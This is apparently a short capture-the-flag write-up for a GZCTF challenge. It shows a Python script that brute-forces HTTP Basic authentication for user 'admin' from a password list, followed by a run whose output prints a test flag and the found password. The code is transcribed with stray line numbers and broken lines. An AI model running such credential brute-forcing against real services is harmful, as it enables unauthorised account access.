simple_dict_brute-base64

原地址: GZCTF-challenges/simple_dict_brute-base64



```
1 import time
 2 import requests
   import base64
4
   url = 'http://IP:PORT/'
    password = []
7
8
   with open("passwords.txt", "r") as f:
            while True:
10
                data = f.readline()
11
                if data:
12
                        password.append(data)
13
```

```
14
                 else:
15
                   break
16
17
    for p in password:
18
            strs = 'admin:'+ p[:-1]
19
            header={
20
                     'Authorization':'Basic
21
    {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
22
23
            rep =requests.get(url,headers=header)
            time.sleep(0.2)
24
            if rep.status code ==200:
25
26
                     print(rep.text)
27
                     print(strs)
28
                     break
```

```
D: > Download > 🕏 2.py > ...
      with open("D:\Download/passwords.txt", "r") as f:
               while True:
                   data = f.readline()
                   if data:
                           password.append(data)
                    break
      for p in password:
              strs = 'admin:'+ p[:-1]
               header={
                       'Authorization':'Basic {}'.format(base64.b64encode(strs.encode('utf-8')).decode('utf-8'))
              rep =requests.get(url,headers=header)
              time.sleep(0.2)
               if rep.status_code ==200:
                       print(rep.text)
                       print(strs)
      輸出
            调试控制台
                      终端 端口
问题
PS C:\Users\LENOVO> & C:/Users/LENOVO/AppData/Local/Programs/Python/Python313/python.exe d:/Download/2.py
d:\Download\2.py:9: SyntaxWarning: invalid escape sequence '\D'
 with open("D:\Download/passwords.txt", "r") as f:
flag{GZCTF_dynamic_flag_test}
admin: ?$ue`WO9
PS C:\Users\LENOVO>
```